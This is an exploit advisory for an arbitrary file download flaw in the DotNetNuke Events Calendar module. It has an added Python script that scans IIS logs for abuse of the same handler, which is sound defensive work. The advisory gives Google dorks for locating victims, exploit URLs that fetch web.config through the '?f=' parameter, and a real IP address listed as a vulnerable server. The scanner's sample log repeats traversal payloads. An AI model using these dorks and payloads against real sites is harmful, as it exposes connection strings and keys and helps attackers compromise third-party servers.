DotNetNuke Events Calendar module version 1.x suffers from a file download vulnerability.
d1f15fdff9c3ce905cddafdc3c7a9f8010b8c470014491176215fee55f096cd8
####################################################################
# Exploit Title : DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : dnnsoftware.com
# Software Information Link : store.dnnsoftware.com/home/product-details/events-calendar
# Software Version : 1.x and All Versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Copyright 2019 by Associated Builders and Contractors''
inurl:''/desktopmodules/eventscalendar/''
# Vulnerability Type : CWE-16 [ Configuration ]
####################################################################
# Description :
*************
* Events Calendar is a calendar module for adding and displaying events, with the time and description entered in a rich text editor.
* DotNetNuke DNNSoftware Events Calendar Modules 1.x and other versions are prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently verify user-supplied input.
* This may allow an attacker to gain access to sensitive information, which may aid in launching further attacks.
* The attacker can download and read any file whose name is known via the '?f=' parameter.
# Arbitrary File Download Exploit :
*******************************
/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
/desktopmodules/eventscalendar/downloaddoc.aspx?f=[DOWNLOAD-ANY-FILE]
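
For defenders, an added example (not part of the original advisory) that scans IIS W3C logs for requests to the handler above whose f= value is rooted, traverses directories, or has an unexpected extension. The log lines are constructed, and the allowed-extension list is an assumption about what the module legitimately serves.

```python
import posixpath
from urllib.parse import parse_qsl, unquote
HANDLER = "/desktopmodules/eventscalendar/downloaddoc.aspx"  # from the advisory
# Assumption: file types the module would legitimately serve as event documents.
ALLOWED_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}

def suspicious_reason(query):
    """Return why the f= value looks like file disclosure, or None if benign."""
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() != "f":          # ASP.NET query keys are case-insensitive
            continue
        for _ in range(3):              # undo double/triple percent-encoding
            value = unquote(value)
        path = value.replace("\\", "/").lower()
        if path.startswith(("~", "/")) or ":" in path:
            return "rooted path"
        if ".." in path.split("/"):
            return "directory traversal"
        if posixpath.splitext(path)[1] not in ALLOWED_EXT:
            return "unexpected file type"
    return None

def scan_iis_log(lines):
    """Yield (client_ip, status, query, reason) for flagged W3C log entries."""
    fields = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # column order is declared by the log itself
            continue
        if line.startswith("#") or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() != HANDLER:
            continue
        reason = suspicious_reason(row.get("cs-uri-query", ""))
        if reason:
            yield row.get("c-ip"), row.get("sc-status"), row["cs-uri-query"], reason

# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2019-01-18 10:00:01 GET /desktopmodules/eventscalendar/downloaddoc.aspx f=agenda.pdf 192.0.2.10 200
2019-01-18 10:00:07 GET /DesktopModules/EventsCalendar/DownloadDoc.aspx f=~/web.config 198.51.100.7 200
2019-01-18 10:00:09 GET /desktopmodules/eventscalendar/downloaddoc.aspx F=..%252f..%252fweb.config 198.51.100.7 404
2019-01-18 10:00:12 GET /default.aspx - 192.0.2.10 200
""".splitlines()

if __name__ == "__main__":
    print(*scan_iis_log(SAMPLE_LOG), sep="\n")
```

A flagged entry with status 200 means the file was served; treat any secrets in it (connection strings, machine keys) as exposed and rotate them.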
####################################################################
# Example Vulnerable Sites :
*************************
Note : (38.95.37.77) => There are 73 domains hosted on this server.
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################